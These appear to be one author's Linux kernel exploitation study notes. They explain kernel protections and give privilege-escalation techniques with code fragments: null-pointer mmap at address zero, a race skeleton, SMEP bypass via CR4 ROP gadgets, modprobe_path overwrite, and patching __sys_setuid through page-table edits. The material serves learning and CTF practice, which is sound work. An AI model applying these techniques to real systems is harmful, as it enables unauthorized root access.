This will be my kernel exploitation notes. This also includes a set of code snippets & helper scripts to make exploitation faster in future.
What you will find here:
- My notes (below)
- Helpers & Code snippets
- Kernel Challenges I authored & writeups
- My kernel challenges writeups
I'll try to make it as simple as possible, incase anyone in the future needs this. However, this will suppose there's a minimum knowledge of binary exploitation (Stack, Heap, protections...) so, user-land exploitation will not be explained here. This is meant to introduce kernel exploitation & dive into it.
I'll be updating this as I make progress, I may mess up sometimes, I may be wrong in some details, I'll try to fix that if I find out about it, so if you find something weird or something wrong, please let me know about it and I'll fix it or add more details if needed, it'll be much appreciated.
What we'll go through:
- Resources
- What's a kernel?
- User space VS Kernel space
- Kernel Protections
- From user to kernel & vice versa
- Kernel Credentials
- How to exploit?
- Attacking Techniques
- EN - Linux Kernel Exploitation - Patrick Biernat
- Hello, kernel: Exploiting an intentionally vulnerable Linux driver
- Practical SMEP bypass techniques on Linux - Vitaly Nikolenko
- Learning Linux Kernel Exploitation - Part 1
- Control Registers
- Meltdown Vulnerability
- Kernel Exploitation Introduction, Techniques, Tools & Writeups by smallkirby
- Writeup - OverTheWire Advent Bonanza 2018 - Snow Hammer
- Writeup - hxp 2018 - Green Computing
More resources will be included below.
Connecting hardware with software, provides an abstraction layer to applications (executing in userland) to interact with the hardware. It's basically the brain of the OS.
Kernel space is what we call Ring 0 (See below for reference). This has access to everything BUT in the hard way, no easy access/abstractions. Basically, any privilege escalation exploit that's relation to linux kernel, or "jailbreaking" for IOS & consoles involves exploiting kernel code, to gain a higher privilege then return to user space with the new privilege.
User space is what we are in all of the time. Every single app you run or use (doesn't matter which permission you used to run it) will be in user space. This is the last ring, which is the least privileged one.
Now, how do these spaces connect? Interrupts.
When we say interrupts, there is a large list of possible interrupts that may happen. For example, sending a SIGINT would result in an interrupt, receiving a network packet would result in an interrupt...
There's also system calls (syscall.sh). For each syscall, there'll be an interrupt.
The kernel will handle each interrupt accordingly, for example, for an open
syscall, it'll look up the file, handle access permissions, open it & return a file descriptor. (Not much details but, just an abstract view for now)
Now, you might think that, for hardware as example, there are lot of brands, versions & models for a very specific device, maybe a keyboard. The kernel will be handling the communication with this device yes, but how does it know everything? How does it know how to communicate with various devices, with different versions & so on.
Here we introduce modules. What if you want to extend your OS? Design a new feature & you need kernel access? How would it be possible? Ofc, you can write your own kernel but that's not a very friendly solution. We have modules to save us! A module is a piece of code that can be loaded & unloaded from the kernel that'll be able to handle specific interrupts. We can use the commands lsmod
, rmmod
& insmod
to manage our modules (Ofc, need root perm).
A module should be running in ring 1/2 but those levels are merged with ring 0, so for linux kernel, our modules will be running in kernel level.
In linux, a device (for example, your memory or storage device) creates a virtual file for you to communicate with, located under /dev
, that's the device's module responsible for that! Ofc, a module doesn't have to create a device file under /dev
, it can for example add a new syscall or something else!
When we say User Space (or user land), we say stack, heap, ASLR, RELRO, PIE, NX... Moving on to Kernel Space, this memory space is 100% separate from the userland, it has it's own stack, heap, memory address range... There's also different type of protections.
Base knowledge:
We have 2 different spaces, kernel space & user space. User space contains user app's code + data (memory), Kernel space contains kernel code & memory.
- Control Registers:
A control register is used to control the behavior of the CPU. In x86-64 CPUs, we have a register called CR4
, this is called Control Register. for example, if the bit 20 is set to 1, this means SMEP is enabled, bit 21 for SMAP. More about this register can be found here.
- SMEP: Supervisor Mode Execution Protection
This protection basically prevents the execution of code from user space when we are in kernel context.
- SMAP: Supervisor Mode Access Protection
This protection prevents execution & access to memory from user space (other than some specific methods that are meant for that.)
- Kallsyms
This is a file located at /proc/Kallsyms
.
Now, the kernel can be considered as any other ELF binary, it has code, it has functions, it has symbols. This file gives us all of the kernel symbols with their associated addresses. It's like a /proc/self/maps
but with more details.
However, this file has been blocked in some kernels, making it return 0 for symbol addresses for low privileged users. Always check incase it's exposed, you never know.
- mmap_min_addr
This protection sets a minimum value for mmap to accept, protecting against NULL pointer dereferences. Since kernel addresses are usually in the lower range of addresses, this can protect from allocating that range of memory by a user space application.
- KASLR
This is similar to ASLR for userspace.
- Kernel Page-Table Isolation (KPTI)
This protection was introduced after Meltdown vulnerability, which used speculative execution added in CPUs to read protected memory addresses, such as kernel space addresses. The vulnerability uses a time-based attack using CPU cache to detect whether or not an instruction has been executed, and since CPUs did not implement checks on protected addresses in speculative execution, an attacker can successfully execute read operations from a protected memory address. For more on this, feel free to check wiki page or this youtube video explaining both Meltdown & Spectre vulnerabilities.
In order to fix these vulnerabilities, CPU manufacturers couldn't change the design of already existing CPUs therefore, a software fix had to be created, which lead to the introduction of a new protection to linux kernel (& other OS kernels) called Kernel Page-Table Isolation (KPTI), which consists of separating the memory pages used in kernel mode & in user mode.
Starting off with what's a memory page? Basically, a memory page is a mapping from virtual memory into physical memory. The physical memory is divided into multiple pages, which then mapped into virtual memory pages for processes.
Previously, both the kernel memory space & the user memory space existed in the same page, allowing access in user mode to kernel memory space. With KPTI, the kernel mode & the user mode will use different pages, with the kernel mode page includes both user memory space & kernel memory space and the user mode page includes only the user memory space & a small section of kernel memory space.
This separation prevents unauthorized access to protected memory in user mode execution.
We'll take a system call as example. The moment you execute syscall
(or int 0x80
if you're on 0x86), an interruption will take place. The kernel will handle this interruption, by having a module for example handling that specific call.
The kernel will save the user space context (RIP, stack address, flags...) then switch to a kernel context.
Returning now from kernel to a user context, the kernel needs to restore the user context then jump back to where it has stopped. To restore the context, we have 2 steps:
-
swapgs
: This is for 64bit architecture, This instruction is intended to set up context switching, or more particular to switch register context from a user land to kernel land and vice-versa. Specifically, swapgs swaps the value of the gs register so that it refers to either a memory location in the running application, or a location in the kernel’s space. This is a requirement for switching contexts! -
iretq/sysretq
: Either of these can be used to perform the actual context switch between user land and kernel land.-
iretq requires five user land register values in this order:
- rip, cs, rflags, sp, ss. So, we have to push them to the stack in the reverse before executing.
-
sysretq when executed moves the value in rcx to rip, which means we have to set up our return adr. Additionally, it moves rflags to r11 which may require additional handling. Finally, sysretq expects the value in rip to be in canonical form, which basically means that bits 48 through 63 of that value must be identical to bit 47 (compare sign extension). If that's not the case, we run in a general protection fault!The sysret instructions seems to have stricter constraints but also have fewer registers involved and generally seems to be faster when executed.
-
There is also the option to use sysexit
instruction (doc), which takes RDX value & sets it as RIP, ECX value & sets it as RSP.
The use of sysexit
is linked to Fast System Calls, which simplifies the process a lot and requires less work! This will also work on both x86 & x86-64 architectures. For Fast System Calls, AMD offers the SYSCALL/SYSRET
pair, while Intel offers SYSENTER/SYSEXIT
.
Okay, so our main goal is to escalate our privileges, therefore, we'll need to go through this. In linux, every thread has a structure task_struct
containing it's information, one of those is the thread credentials. In that structure, we have a pointer to a struct cred
(Reference: task_struct)
So, if we can change our current thread's cred structure value, we can escalate our privileges! Luckly, there are 2 kernel calls that can help with this:
- prepare_kernel_cred: Calling
prepare_kernel_cred(NULL)
will create a new structure for us with root privileges! Ain't that something? - commit_creds: This function takes a cred structure & applies it to our current thread, so basically we'll be calling
commit_creds(prepare_kernel_cred(NULL))
to become root.
Both these functions use fastcall calling convention, means parameters are passed through rax
, edx
, ecx
.
This is a basic section, we'll go in more details later on with more examples. So what we'll be doing is mainly interacting with linux modules. A module can create a device file, located in /dev
, add a new syscall or register a character device. There might be some other ways, since you're like, kernel level?
For a device file, you can simply open the file & interact with it (R/W):
dev = open(MOD_DEV, O_RDWR);
read(dev, buff, size);
write(dev, buff, size);
Or if it's a syscall, you should know what you can do already since you're here.
Last, you can use ioctl
to communicate with the module. We'll get more info on this later.
- Buffer overflow
A buffer overflow vulnerability in kernel land is similar to user land, we might face a canary if enabled, we will have to leak it, eventually we can do a ROP chain (will be discussed below)... There is not much to talk about here.
- Null pointer dereferences
In nowadays systems, there's a minimum value for the addresses that can be mmaped by non-root users, to view this on your system, you can check
cat /proc/sys/vm/mmap_min_addr
So what's this exploit about?
If we have the following code:
struct something{
int (*fn_ptr)(void* param);
} x;
void main(){
x.fn_ptr();
}
As an initial value, x.fn_ptr
should be NULL, which means 0. This would result in a memory error, but what if we can allocate a memory chunk starting at address 0x0? The above code would actually work if we set a proper value!
So what we can do is
void main()
{
mmap(0, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON | MAP_PRIVATE | MAP_FIXED, -1, 0);
unsigned long *p = 0;
p[0] = 0xdeadbeef;
x.fn_ptr();
}
And this will call 0xdeadbeef
for us! Ofc the mmap call wouldn't work if your /proc/sys/vm/mmap_min_addr
is not 0, and that's one of the protections we talked about earlier.
- Concurrent execution
In user-space applications, when we write a function & we do not use any sort of concurrent execution methods (exp. threads), we should be safe from concurrent execution attacks.
Now, looking into kernel-space, things are a bit different. Let's suppose we have this kernel module:
struct module_struct {
ssize_t (*fn_pointer)();
} global_instance;
static ssize_t some_valid_function()
{
// ...
}
static ssize_t module_read(struct file *f, char __user *buf, size_t len, loff_t *off)
{
return (global_instance.fn_pointer)();
}
static ssize_t module_write(struct file *f, const char __user *buf,size_t len, loff_t *off)
{
// ...
global_instance.fn_pointer = 0;
// ...
global_instance.fn_pointer = &some_valid_function;
}
At first glance, this code might seem safe, however, if you become aware that the calls to module_read
& module_write
from user-space programs are executed in paralel, this might open up the door for a race in order to get a null pointer dereference.
To simplify things, we'll use a null pointer dereference & consider that we are able to allocate address 0x0 (mmap_min_addr = 0).
How can we attack this piece of code? Simply run multiple threads or use a fork, one will call module_write
& the other will call module_read
. And hope that the gap between global_instance.fn_pointer = 0;
& global_instance.fn_pointer = &some_valid_function;
would take long enough to run, to give you more chance to call fn_pointer
while it's still NULL.
Example using fork:
void main(){
char shellcode[] = "...";
mmap(0, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON | MAP_PRIVATE | MAP_FIXED, -1, 0);
memcpy(0, shellcode, sizeof(shellcode));
dev = open_dev();
if (fork() == 0)
{
read(dev, te, 5);
// Child becomes root if we are lucky enough.
}
else
{
write(dev, buff, size);
}
}
- Bypassing SMEP
To check for SMEP, we can check /proc/cpuinfo
for smep
flag. We can run cat /proc/cpuinfo | grep smep
to get direct results.
As we talked earlier about Control Registers, they are simply registers. This means we can change their values using assembly instructions, for example executing mov cr4, 0x1407e0
will disable SMEP for us! What's important here is to use a value with the 20th bit set to 0. This value can be a constant value, you can get it by debugging.
How to do that now? Well, since we cannot execute user-space code, it'll be either a shellcode in kernel-space OR our good old friend, ROP chains.
- ROP Chains
A ROP chain in kernel-space is the same as we are used to before in user land. We have a bzImage or a vmlinuz, which contains the compressed linux kernel. To search for ROP gadgets, we will have to decompress it. You can find here a useful bash script to automatically decompress it. Usage like following:
./extract-image.sh ./bzImage > vmlinux
Now, examining our vmlinux
file, we find it's an ELF & we can run ropper to find ROP gadgets!
Going back to bypassing SMEP, we might stumble upon these 2 gadgets:
mov cr4, eax; pop ebp; ret;
pop eax; ret;
which, if you are already familiar with ROP chains in user land, you would know that these are enough to change the value of CR4
register & therefore, disabling SMEP.
- Arbitrary Write
Let's suppose we currently have an arb. write vulnerability, how can we make use of this?
Starting off with modprobe_path
. What happens when you run a file with an unknown magic bytes in linux? Just to be clear here, magic bytes are the first 8 bytes of a file in linux, they are used to identify the "extension" (if you are a windows user) of the file, and which program will be used to execute this file. Now, if these magic bytes are unknown, linux kernel would run a program called modprobe
as an attempt to identify which program should be used to run this file.
Luckly for us, the kernel stores the path of modprobe
in a memory variable, called modprobe_path
! On top of this, modprobe
is executed as root! We cannot ask for more at this point.
So, the strategy is overwriting modprobe_path
to a controlled binary/shell script that'll give us root privileges later on. Simple right?
A much more detailed doc is kernelpwn by smallkirby which is definetly worth looking at! (It got lota interesting stuff too worth checking)
One important condition for this technique to work is CONFIG_STATIC_USERMODEHELPER
must not be defined (when building the kernel). That is used to hard-code the value of modprobe
path, the variable modprobe_path
will still exist but overwriting it will be useless! In order to verify if it's defined or no, we can execute the following:
/ # cat /proc/kallsyms | grep call_usermodehelper_setup
ffffffff810c8c80 T call_usermodehelper_setup
ffffffff82458118 r __ksymtab_call_usermodehelper_setup
ffffffff82477e3d r __kstrtab_call_usermodehelper_setup
ffffffff8247c3c4 r __kstrtabns_call_usermodehelper_setup
The above is the case when CONFIG_STATIC_USERMODEHELPER
is defined. Another method to verify would be checking call_usermodehelper_setup
disassembly. For more details check this out (by smallkirby).
Another way to gain root would be overwriting cred
structure for the current thread. A good reference to this is this writeup.
Basically, linux kernel keeps track of each process' credential in a struct, containing the task's uid & gid. Overwriting these to 0 will give us to root. This technique however requires a memory read to find the creds structure for current process in memory.
You can find the structure definition here, this is an old version and only used as an example.
Another technique is changing the kernel's code! But you might ask, the kernel code should be in a R-X
memory page no? Right, and we will change that!
Our first option is by changing CR0
register, by setting the 16th bit to 0, we will become able to write to read-only pages when we are in kernel mode. Another option is to update the page permissions, one great writeup that'll guide us through this is OverTheWire Advent Bonanza 2018 - Snow Hammer.
Let's take an example, we will try to change the code of __sys_setuid
function located at 0xffffffff81031f5e
.
First, we need to understand how pages are managed by the kernel. We start with Page Map Level 4
table, we can find the physical address of this structure by inspecting CR3 register.
Now, how can we access this physical memory? We can make use of qemu's monitor in order to dump the physical memory into a file, we can do so by adding -monitor tcp::5555,server,nowait
to qemu's args & later connecting to the specified port, we can use telnet
to do so.
After connecting, we can view registers (or can use gdb for this too) & save the physical memory:
(qemu) pmemsave 0 0x8000000 memdump
(qemu) info registers
CR0=80050033 CR2=0000000000dc57b8 CR3=000000000775a000 CR4=000006b0
We can now view the physical memory at 0x000000000775a000, this is the Page Map Level 4
table.
$ xxd -e -g8 -c8 -a -s 0x775a000 -l 0x1000 memdump
0775a000: 8000000007745067 gPt.....
0775a008: 0000000000000000 ........
*
0775a7f8: 8000000007771067 g.w.....
0775a800: 0000000000000000 ........
*
0775a880: 0000000001b47067 gp......
0775a888: 0000000000000000 ........
*
0775ac90: 0000000000080067 g.......
0775ac98: 0000000000000000 ........
*
0775aea0: 0000000006370067 g.7.....
0775aea8: 0000000000000000 ........
*
0775afe0: 0000000006b6f067 g.......
0775afe8: 0000000000000000 ........
0775aff0: 0000000000000000 ........
0775aff8: 0000000001a16067 g`......
Examining the address we are looking for now:
0xffffffff81031f5e = 0b 1111111111111111 111111111 111111110 000001000 000110001 111101011110
PML4 PML3 PT PTE offset
We have our PML4 index "111111111" = 511, multiplied by the entry size 8, we have our offset at 0xff8. This gives us 0775aff8: 0000000001a16067
which is a physical address. The 0x67 at the end are flags we can ignore.
Continuing, we examine the physical address 0x01a16067
, containing Page Map Level 3
$ xxd -e -g8 -c8 -a -s 0x0000000001a16000 -l 0x1000 memdump
01a16000: 0000000000000000 ........
*
01a16ff0: 0000000001a17063 cp......
01a16ff8: 0000000001a18067 g.......
Which gives us after calculating the offset (0xff0) , we get 01a16ff0: 0000000001a17063
, same as earlier, 0x63 are flags.
Now, we have the page table at address 0x01a17000. We can examine this physical address:
$ xxd -e -g8 -c8 -a -s 0x0000000001a17000 -l 0x1000 memdump
01a17000: 0000000000000000 ........
*
01a17040: 00000000010001e1 ........
01a17048: 00000000012001e1 .. .....
01a17050: 00000000014001e1 ..@.....
01a17058: 0000000007869163 c.......
01a17060: 80000000018001e1 ........
01a17068: 0000000007868063 c.......
01a17070: 0000000000000000 ........
*
01a17ff8: 0000000000000000 ........
Same as earlier, we calculate our offset (0b000001000 * 8 = 0x40), gives us 01a17040: 00000000010001e1
. This value is contains our page flags!
Now, we have to find the virtual address that's pointing to this physical address. We can examine info tlb
in qemu monitor to identify the base virtual address that's mapped to the TE, in our case 0xffffffff81a17000.
We can also confirm this in gef by running xinfo
:
gef> xinfo 0xffffffff81a17000
---------------------------------------------------------------- xinfo: 0xffffffff81a17000 ----------------------------------------------------------------
Virtual address start-end Physical address start-end Total size Page size Count Flags
0xffffffff81a00000-0xffffffff81c00000 0x0000000001a00000-0x0000000001c00000 0x200000 0x1000 512 [RW- KERN ACCESSED DIRTY GLOBAL]
Offset (from virt mapped): 0xffffffff81a00000 + 0x17000
Offset (from phys mapped): 0x1a00000 + 0x17000
Back to the 00000000010001e1
we found, in binary format below are some flags:
0b1000000000000000111100001
|||_ Present bit
||__ Writeable flag (we will flip this)
|___ User-Accessible flag
And this is a RW
section!
After changing .text
segment to RWX
, we will either write a shellcode or patch an existing function. An example of a patch we can do is to change setuid
handler. We can see below setuid
code:
long __sys_setuid(uid_t uid)
{
[...]
new = prepare_creds();
[...]
return commit_creds(new);
}
One potential patch is to change prepare_creds
to prepare_kernel_cred
, and we can obtain root credential that will be passed to commit_creds
.
Let's take an example:
0xffffffff81031f5e: __sys_setuid
0xffffffff81039cab: prepare_creds
0xffffffff81039ea6: prepare_kernel_cred
Examining the assembly:
gef> x/20i 0xffffffff81031f5e
0xffffffff81031f5e: cmp edi,0xffffffff
0xffffffff81031f61: mov rax,0xffffffffffffffea
0xffffffff81031f68: je 0xffffffff81032016
0xffffffff81031f6e: push r12
0xffffffff81031f70: push rbp
0xffffffff81031f71: mov ebp,edi
0xffffffff81031f73: push rbx
0xffffffff81031f74: push rcx
0xffffffff81031f75: call 0xffffffff81039cab
0xffffffff81031f7a: mov rbx,rax
We are interested in the call 0xffffffff81039cab
instruction, patching it to call 0xffffffff81039ea6
, which is 16bytes write, is enough to give us root when executing setuid
syscall.